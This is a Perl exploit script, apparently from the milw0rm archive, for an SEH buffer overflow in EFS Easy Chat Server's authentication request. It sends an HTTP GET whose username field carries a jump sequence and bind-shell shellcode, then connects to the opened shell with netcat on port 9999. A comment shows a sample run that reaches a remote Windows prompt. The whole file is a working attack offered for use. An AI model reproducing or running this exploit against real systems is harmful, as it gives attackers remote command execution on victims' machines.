#!/usr/bin/perl
#
# EFS Easy Chat Server Authentication Request Buffer Overflow (SEH)
#
# Reference: http://www.milw0rm.com/exploits/8142
#
# Tested in Windows XP Pro SP2-3
#
# Coded by Dr4sH (Bruno F.)
#
# Contact: dr4sh[at]hotmail[dot]com
#
# Thankz: His0ka, str0ke, Vinicius N.
#
#[......................................................]
#
# bt~# perl easychat_server_bof.pl 192.168.1.64
#
# EFS Easy Chat Server Remote BoF Exploit (SEH)
#
# [*] Sending Diabolic request...
# [*] Connecting to bindshell 192.168.1.64:9999
#
# Microsoft Windows XP [versÃ£o 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\Easy Chat Server>
#
#[......................................................]
#
# Enjoy!
#

use IO::Socket;

print "\nEFS Easy Chat Server Remote BoF Exploit (SEH)\n\n";

$host = shift || die "Usage: perl $0 <host>\n";

$junk = "\x90" x 208;
$jmp  = "\xEB\x06\xAE\xFA";
$ppr  = "\xB6\xB2\x01\x10";

$shellcode = "\xd9\xe8\xd9\x74\x24\xf4\xbb\xb6\x14\x60\xe5\x5d\x33\xc9\xb1".
			 "\x50\x31\x5d\x19\x03\x5d\x19\x83\xed\xfc\x54\xe1\x9c\x8f\x73".
			 "\x47\xb5\xa9\x7c\xa7\xba\x2a\x09\x34\x61\x8f\x86\x80\x55\x44".
			 "\xe4\x0f\xde\x5b\xfb\x9b\x51\x44\x88\xc3\x4d\x75\x65\xb2\x06".
			 "\x41\xf2\x44\xf7\x9b\xc4\xde\xab\x58\x04\x94\xb4\xa1\x4e\x58".
			 "\xba\xe3\xa5\x97\x87\xb7\x1d\x70\x8d\xd2\xd6\xdf\x49\x1c\x03".
			 "\xb9\x1a\x12\x98\xcd\x42\x37\x1f\x39\x7f\x6b\x94\x34\xec\x57".
			 "\xb6\x27\x2e\xa6\x1d\xc3\x3b\x8a\x91\x87\x7c\x01\x5a\xe7\x60".
			 "\xb4\xd7\x48\x91\x98\x8f\xc6\xef\x2a\xa3\x87\x10\xe4\x5d\x7b".
			 "\x89\x61\x92\x49\x3d\x05\xa7\x9f\xe2\xbd\xb8\x30\x74\xf5\xab".
			 "\x4d\xbe\x59\xcc\x78\x9e\xd0\xd7\xe3\xa0\x0e\x1f\xee\xf7\xba".
			 "\x1d\x11\x27\x52\xf8\xe4\x3d\x0e\xad\x09\x6b\x02\x02\xa5\xc7".
			 "\xf6\xe7\x1a\xab\xab\x18\x4c\x4d\x24\xc1\x62\xf4\xe7\x84\x9c".
			 "\x6d\x6f\x32\x44\xfe\xb7\x6d\x86\x28\x5d\x81\x29\x80\x5d\x71".
			 "\xa1\x8e\x0f\x5f\xdb\x98\xb0\x49\x48\x72\xb0\xa5\x07\x99\x07".
			 "\xc3\x91\x36\x67\x1d\x71\xed\xc3\xf4\x8d\xdd\x7f\x9e\x96\xa7".
			 "\xb9\x27\x0e\xa7\x90\x82\x4f\x87\x7b\x46\xd4\x4e\xec\xf5\x79".
			 "\x06\x09\x93\xd1\x41\xfb\xaf\x5b\x96\x91\x6b\xd5\xbb\x57\xb3".
			 "\x16\x91\x66\x71\xf4\x18\xd4\x59\x95\x68\xa3\x99\x32\xd9\xff".
			 "\xb1\x36\xe0\xb3\x57\x48\x69\xf0\xa8\x60\xc9\xaf\x04\xdc\xbf".
			 "\x1e\xc2\xdf\x6e\xf0\x47\xb1\x6f\x22\x0f\x9c\x49\xc6\x01\x8d".
			 "\x96\x1f\xf7\xcd\x96\x97\xf8\xe2\xe2\x8f\xfa\x80\x31\x4b\xfd".
			 "\x51\xeb\x6b\xd1\x36\xfc\x1e\xd5\x99\xaf\xe1\x03\xda\x80\x14";

$buffer = $junk.$jmp.$ppr.$shellcode;

$socket = IO::Socket::INET->new(PeerAddr=> $host,
                                PeerPort=> '80',
                                Proto=> 'tcp',
                                Timeout=>'1') || die "[-] Unable to Connect.!\n";

print "[*] Sending Diabolic request...\n";

print $socket "GET /chat.ghp?username=".$buffer."&password=ydw&room=2&ydw=2 HTTP/1.1\r\n";
print $socket "Host: $host\r\n\r\n\r\n";

close($socket);

print "[*] Connecting to bindshell $host:9999\n\n";

system("nc $host 9999");

# milw0rm.com [2009-03-04]
